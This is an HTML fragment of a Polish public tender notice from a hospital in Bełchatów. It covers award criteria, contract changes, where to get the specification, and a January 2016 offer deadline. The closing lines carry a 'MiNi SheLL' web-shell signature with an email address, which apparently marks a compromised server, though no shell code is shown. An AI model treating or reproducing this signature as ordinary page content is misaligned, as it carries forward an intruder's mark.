<li>1 - Cena - 98</li>
<li>2 - Czas odbioru odpadów w przypadku zlecenia wykonania usługi dodatkowej - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie dopuszczalne zmiany postanowień umowy oraz warunki tych zmian zostały określone we wzorze umowy stanowiącej Załącznik nr 3 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-belchatow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wojewódzki im. Jana Pawła II w Bełchatowie, ul. Czapliniecka 123 - Dział zamówień publicznych i zaopatrzenia ( pok. 92).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2016 godzina 11:00, miejsce: Sekretariat p.o. Dyrektora Szpitala Wojewódzkiego im. Jana Pawła II, ul. Czapliniecka 123, 97-400 Bełchatów (pok. 18).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com